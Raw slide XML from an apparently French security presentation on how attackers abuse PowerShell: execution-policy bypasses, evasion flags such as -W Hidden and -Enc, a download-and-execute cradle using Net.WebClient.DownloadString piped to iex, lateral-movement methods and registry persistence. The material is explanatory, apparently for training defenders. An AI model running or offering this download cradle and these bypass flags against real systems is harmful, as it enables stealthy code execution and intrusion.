            </a:rPr>
            <a:t>démarrage</a:t>
          </a:r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 WMI</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> GPOs
 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Profils</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>locaux</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2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 custScaleY="131044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128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128"/>
          <a:ext cx="6175375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Par défaut, Microsoft restreint les scripts PowerShell avec des politiques d'exécution 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Restricted  / </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>AllSigned</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>   / </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>RemoteSigned</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>    / Unrestricted   / Bypass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128"/>
        <a:ext cx="6175375" cy="2538542"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F1AF51EE-E3E4-7A4F-8716-70015E55D922}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2321214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540671"/>
          <a:ext cx="6175375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Bypass offensive :</a:t>
          </a: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a) TYPE myScript.ps1 | PowerShell.exe -</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>noprofile</a:t>
          </a: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endParaRPr lang="en-US" sz="2400" b="1" i="1" kern="1200" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="accent3">
                <a:lumMod val="75000"/>
              </a:schemeClr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b) powershell.exe -command “</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>iex</a:t>
          </a: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(New-Object </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Net.WebClient</a:t>
          </a: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).</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>DownloadString</a:t>
          </a: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(‘http://[REMOVED]/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>myScript</a:t>
          </a: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. ps1’)”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540671"/>
        <a:ext cx="6175375" cy="2538542"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{453B5C1B-7479-A64C-A62F-F8FF11789102}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="5079213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79213"/>
          <a:ext cx="6175375" cy="17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79213"/>
        <a:ext cx="6175375" cy="170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128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128"/>
          <a:ext cx="6175375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Par défaut, Microsoft restreint les scripts PowerShell avec des politiques d'exécution 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Restricted  / </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>AllSigned</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>   / </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>RemoteSigned</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>    / Unrestricted   / Bypass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128"/>
        <a:ext cx="6175375" cy="2538542"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F1AF51EE-E3E4-7A4F-8716-70015E55D922}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2321214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540671"/>
          <a:ext cx="6175375" cy="253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Bypass offensive :</a:t>
          </a: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c) powershell.exe -</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>enc</a:t>
          </a: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 [ENCODED COMMAND] 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d) powershell.exe -</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>ExecutionPolicy</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> bypass -File myScript.ps1 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540671"/>
        <a:ext cx="6175375" cy="2538542"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{453B5C1B-7479-A64C-A62F-F8FF11789102}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="5079213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79213"/>
          <a:ext cx="6175375" cy="17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79213"/>
        <a:ext cx="6175375" cy="170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130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1302"/>
          <a:ext cx="6175375" cy="220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PowerShell accepte une liste drapeaux à ligne de commande.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Arguments pour échapper à la détection et contourner les restrictions locales : 
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302"/>
        <a:ext cx="6175375" cy="2207762"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F1AF51EE-E3E4-7A4F-8716-70015E55D922}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="195895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209064"/>
          <a:ext cx="6169344" cy="289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rgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> -</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>NoP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>/-</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>NoProfile</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(ignore les commandes du fichier de profil)   </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
   -</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Enc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>/-</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>EncodedCommand</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(exécute une commande en Base64)   </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
   -W </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Hidden</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>/-</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>WindowStyle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Hidden</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(cache la fenêtre de commande) </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>  
   -</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Exec</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> bypass/-</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>ExecutionPolicy</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> Bypass </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(ignore la restriction de la politique d'exécution)   </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
  -</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>NonI</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>/-</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>NonInteractive</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(ne pas exécuter un </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>shell</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> interactif)   </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
   -C/-Command </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(exécute une seule commande)   </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
   -F/-File </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(exécuter des commandes à partir d'un fichier spécifié) </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
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209064"/>
        <a:ext cx="6169344" cy="2893140"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{453B5C1B-7479-A64C-A62F-F8FF11789102}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="5102205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102205"/>
          <a:ext cx="6175375" cy="1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102205"/>
        <a:ext cx="6175375" cy="147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130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1302"/>
          <a:ext cx="6175375" cy="220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Dans les scripts PowerShell malveillants, les commandes et fonctions les plus fréquemment utilisées sur la ligne de commande sont les suivantes : 
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302"/>
        <a:ext cx="6175375" cy="2207762"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F1AF51EE-E3E4-7A4F-8716-70015E55D922}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="195895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209064"/>
          <a:ext cx="6169344" cy="289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a.(New-Object </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>System.Net.Webclient</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>).</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>DownloadString</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>()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b.(New-Object </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>System.Net.Webclient</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>).</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>DownloadFile</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>()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</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>c.IEX</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> / -Invoke-Expression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</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>d.Start</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>-Process </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
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209064"/>
        <a:ext cx="6169344" cy="2893140"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{453B5C1B-7479-A64C-A62F-F8FF11789102}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="5102205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102205"/>
          <a:ext cx="6175375" cy="1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102205"/>
        <a:ext cx="6175375" cy="147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130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1302"/>
          <a:ext cx="6175375" cy="220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chemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Techniques permettent aux attaquants de se propager dans tout l'environnement d'une entreprise à partir d'un seul ordinateur compromis. 
Différentes méthodes disponibles pour exécuter des commandes PowerShell sur un ordinateur distant </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
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302"/>
        <a:ext cx="6175375" cy="2207762"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F1AF51EE-E3E4-7A4F-8716-70015E55D922}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="195895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209064"/>
          <a:ext cx="6169344" cy="289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Invoke-Command   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Enter-</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>PSSession</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>   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WMI/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>wmic</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>/Invoke-</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>WMImethod</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>   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 Profile injection   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 Common tools (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>PsExec</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>, Task </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Sheduler</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> )</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
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209064"/>
        <a:ext cx="6169344" cy="2893140"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{453B5C1B-7479-A64C-A62F-F8FF11789102}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="5102205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102205"/>
          <a:ext cx="6175375" cy="1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102205"/>
        <a:ext cx="6175375" cy="147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130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1302"/>
          <a:ext cx="6175375" cy="220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/>
              </a:solidFill>
            </a:rPr>
            <a:t>Les adversaires tentent de rester sur les ordinateurs compromis en créant un point de chargement (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>load</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> point) persistant qui redémarre le </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>backdoor</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> lorsque Windows redémarre.
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302"/>
        <a:ext cx="6175375" cy="2207762"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F1AF51EE-E3E4-7A4F-8716-70015E55D922}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1958952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209064"/>
          <a:ext cx="6169344" cy="289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Base de </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>registres</a:t>
          </a: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</a:t>
          </a:r>
          <a:r>
